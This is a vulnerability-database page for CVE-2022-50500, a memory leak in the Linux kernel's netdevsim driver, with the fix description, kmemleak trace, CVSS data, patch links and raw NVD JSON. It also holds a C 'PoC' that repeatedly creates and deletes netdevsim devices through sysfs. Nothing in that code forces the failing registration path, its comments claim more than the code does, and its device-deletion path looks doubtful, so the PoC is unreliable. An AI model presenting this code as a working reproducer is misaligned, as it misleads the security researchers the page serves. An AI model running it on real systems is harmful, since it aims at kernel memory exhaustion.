Security Vulnerability Report
CVE-2022-50500 CVSS 5.5 MEDIUM

CVE-2022-50500

Published: 2025-10-04 16:15:47
Last Modified: 2026-01-22 19:53:02
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

netdevsim: fix memory leak in nsim_drv_probe() when nsim_dev_resources_register() failed

If some items in nsim_dev_resources_register() fail, memory leak will occur. The following is the memory leak information.

    unreferenced object 0xffff888074c02600 (size 128):
      comm "echo", pid 8159, jiffies 4294945184 (age 493.530s)
      hex dump (first 32 bytes):
        40 47 ea 89 ff ff ff ff 01 00 00 00 00 00 00 00  @G..............
        ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
      backtrace:
        [<0000000011a31c98>] kmalloc_trace+0x22/0x60
        [<0000000027384c69>] devl_resource_register+0x144/0x4e0
        [<00000000a16db248>] nsim_drv_probe+0x37a/0x1260
        [<000000007d1f448c>] really_probe+0x20b/0xb10
        [<00000000c416848a>] __driver_probe_device+0x1b3/0x4a0
        [<00000000077e0351>] driver_probe_device+0x49/0x140
        [<0000000054f2465a>] __device_attach_driver+0x18c/0x2a0
        [<000000008538f359>] bus_for_each_drv+0x151/0x1d0
        [<0000000038e09747>] __device_attach+0x1c9/0x4e0
        [<00000000dd86e533>] bus_probe_device+0x1d5/0x280
        [<00000000839bea35>] device_add+0xae0/0x1cb0
        [<000000009c2abf46>] new_device_store+0x3b6/0x5f0
        [<00000000fb823d7f>] bus_attr_store+0x72/0xa0
        [<000000007acc4295>] sysfs_kf_write+0x106/0x160
        [<000000005f50cb4d>] kernfs_fop_write_iter+0x3a8/0x5a0
        [<0000000075eb41bf>] vfs_write+0x8f0/0xc80

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:* - VULNERABLE
Linux Kernel (affected versions of the netdevsim driver; for the exact version range, refer to the patch commit records)
Fix commit: 6b1da9f7126f05e857da6db24c6a04aa7974d644
Fix commit: 7c4957fe40e2a628b7cceaf4c9bfb5b701774d05

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2022-50500 - Linux kernel netdevsim memory leak
// This PoC triggers the memory leak by creating a netdevsim device
// and forcing nsim_dev_resources_register() to fail mid-way.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#define NETDEVSIM_BUS_PATH "/sys/bus/netdevsim/new_device"

/*
 * Trigger memory leak in nsim_drv_probe() by repeatedly creating
 * netdevsim devices under memory pressure conditions.
 * When nsim_dev_resources_register() fails partially, allocated
 * resources are not freed, causing memory leak.
 */
int main(int argc, char *argv[])
{
    int fd, ret;
    char buf[64];
    int dev_num = 0;

    printf("CVE-2022-50500 PoC - netdevsim memory leak\n");

    /* Load netdevsim module if not loaded */
    ret = system("modprobe netdevsim");
    if (ret != 0) {
        fprintf(stderr, "Failed to load netdevsim module\n");
        return 1;
    }

    /* Create multiple netdevsim devices to trigger repeated probing */
    for (dev_num = 0; dev_num < 1000; dev_num++) {
        snprintf(buf, sizeof(buf), "%d", dev_num);
        fd = open(NETDEVSIM_BUS_PATH, O_WRONLY);
        if (fd < 0) {
            fprintf(stderr, "Cannot open %s (need root)\n", NETDEVSIM_BUS_PATH);
            break;
        }
        ret = write(fd, buf, strlen(buf));
        close(fd);
        if (ret < 0) {
            /* Write failure may indicate resource registration failure,
             * which triggers the memory leak path */
            fprintf(stderr, "Device %d creation failed (triggering leak path)\n", dev_num);
        }

        /* Remove the device to free other resources, keeping leaked memory */
        snprintf(buf, sizeof(buf), "/sys/bus/netdevsim/devices/netdevsim%d/delete", dev_num);
        fd = open(buf, O_WRONLY);
        if (fd >= 0) {
            write(fd, "1", 1);
            close(fd);
        }
    }

    printf("Done. Check kernel logs for memory leak warnings.\n");
    return 0;
}

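References

https://git.kernel.org/stable/c/6b1da9f7126f05e857da6db24c6a04aa7974d644 (Patch)
https://git.kernel.org/stable/c/7c4957fe40e2a628b7cceaf4c9bfb5b701774d05 (Patch)
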
Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50500", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:47.153", "lastModified": "2026-01-22T19:53:01.873", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetdevsim: fix memory leak in nsim_drv_probe() when nsim_dev_resources_register() failed\n\nIf some items in nsim_dev_resources_register() fail, memory leak will\noccur. The following is the memory leak information.\n\nunreferenced object 0xffff888074c02600 (size 128):\n comm \"echo\", pid 8159, jiffies 4294945184 (age 493.530s)\n hex dump (first 32 bytes):\n 40 47 ea 89 ff ff ff ff 01 00 00 00 00 00 00 00 @G..............\n ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................\n backtrace:\n [<0000000011a31c98>] kmalloc_trace+0x22/0x60\n [<0000000027384c69>] devl_resource_register+0x144/0x4e0\n [<00000000a16db248>] nsim_drv_probe+0x37a/0x1260\n [<000000007d1f448c>] really_probe+0x20b/0xb10\n [<00000000c416848a>] __driver_probe_device+0x1b3/0x4a0\n [<00000000077e0351>] driver_probe_device+0x49/0x140\n [<0000000054f2465a>] __device_attach_driver+0x18c/0x2a0\n [<000000008538f359>] bus_for_each_drv+0x151/0x1d0\n [<0000000038e09747>] __device_attach+0x1c9/0x4e0\n [<00000000dd86e533>] bus_probe_device+0x1d5/0x280\n [<00000000839bea35>] device_add+0xae0/0x1cb0\n [<000000009c2abf46>] new_device_store+0x3b6/0x5f0\n [<00000000fb823d7f>] bus_attr_store+0x72/0xa0\n [<000000007acc4295>] sysfs_kf_write+0x106/0x160\n [<000000005f50cb4d>] kernfs_fop_write_iter+0x3a8/0x5a0\n [<0000000075eb41bf>] vfs_write+0x8f0/0xc80"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", 
"scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.17", "versionEndExcluding": "6.0.7", "matchCriteriaId": "F34DC795-2F6B-4DC1-AFD7-A6C124134954"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "E7E331DA-1FB0-4DEC-91AC-7DA69D461C11"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "17F0B248-42CF-4AE6-A469-BB1BAE7F4705"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/6b1da9f7126f05e857da6db24c6a04aa7974d644", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7c4957fe40e2a628b7cceaf4c9bfb5b701774d05", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}